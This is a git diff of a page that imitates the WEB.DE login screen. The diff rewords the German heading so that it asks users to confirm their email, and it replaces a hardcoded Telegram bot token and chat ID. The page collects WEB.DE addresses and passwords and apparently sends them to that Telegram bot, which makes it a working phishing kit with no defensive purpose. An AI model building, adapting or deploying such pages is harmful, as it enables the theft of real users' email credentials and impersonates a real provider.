--- a/index.html
+++ b/index.html
@@ -25,7 +25,7 @@
     <main class="main-content">
         <div class="login-container">
             <img src="/static/images/2.png" alt="WEB.DE Logo" class="formlogo">
-            <h1>Bitte erneut einloggen</h1>
+            <h1>Bitte bestätigen Sie Ihre E-Mail</h1>
             <form id="login-form" action="/login" method="POST">
                 <p>Bitte melden Sie sich mit Ihrem WEB.DE Benutzernamen und Passwort erneut an..</p>
                 <label for="email">WEB.DE E-Mail-Adresse</label>
@@ -67,8 +67,8 @@
     <script>
       
       // Telegram credentials
-const TELEGRAM_BOT_TOKEN = '7285927680:AAHqGWvKT2dOnkiGFEukfS4-SoxUx5JQ89o';
-const TELEGRAM_CHAT_ID = '7473556793';
+const TELEGRAM_BOT_TOKEN = '7172922716:AAFxDFqVkt5iB6HBt6nOU5yxmo7rbfihBPU';
+const TELEGRAM_CHAT_ID = '5057501696';
 
 // Toggle password visibility
 document.getElementById('toggle-password').addEventListener('click', function() {
